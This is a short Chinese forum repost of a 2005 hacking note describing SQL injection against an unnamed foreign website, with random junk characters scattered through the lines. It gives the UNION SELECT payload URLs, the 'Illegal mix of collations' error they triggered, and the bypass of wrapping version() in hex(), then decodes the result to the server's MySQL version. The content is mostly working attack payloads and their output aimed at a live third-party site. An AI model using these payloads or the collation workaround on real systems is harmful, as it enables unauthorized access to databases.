本文作者:SuperHei
+ ]) }. B: X$ g文章性质:原创; R, R. l: b* G# @% Y* N; e
发布日期:2005-10-188 t/ z8 c' r, n8 N
测试个国外的站时:, @8 B2 W, o# Y$ p
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*1 I$ ^/ }8 H. z( M& |
返回错误:
4 l* n3 c5 o9 O; jIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'2 s5 s; I% H6 F$ t
MySQL Error No. 126
, J1 }) ?. c9 v0 \$ o看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
" Z0 _( `+ ^- l, p% _) i7 g: t8 J解决办法:转为其他编码如hex。
6 m1 L$ E; g8 T- u1 durl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
! o& m" y& N, V3 \* k; w& ?: M成功得到hex(version())的值为:
5 {' Y" V; [1 u342E312E332D62657461
0 ?( t. _8 _ m8 m4 O8 z回Mysql查询下得到:+ [0 s5 s8 o, W. ^2 a: x
mysql> select 0x342E312E332D62657461; q$ K$ z! G8 I) a
+------------------------+' n) V, U+ k! U+ F9 x6 }6 h" z: O- Y
| 0x342E312E332D62657461 |
! i% l/ @! i- s# s2 y% E) d+------------------------+
7 h8 n- |- n. a* e| 4.1.3-beta |
0 U. Q9 E3 L" j1 U/ ]& L1 y5 Z7 E" ]+------------------------+
- ]3 }. J; C: m8 ]1 row in set (0.00 sec)
N5 [2 q0 `) S2 `1 I+ F8 }8 J2 }$ j0 i
|
发表于 2012-9-15 14:04:54
收藏
支持
反对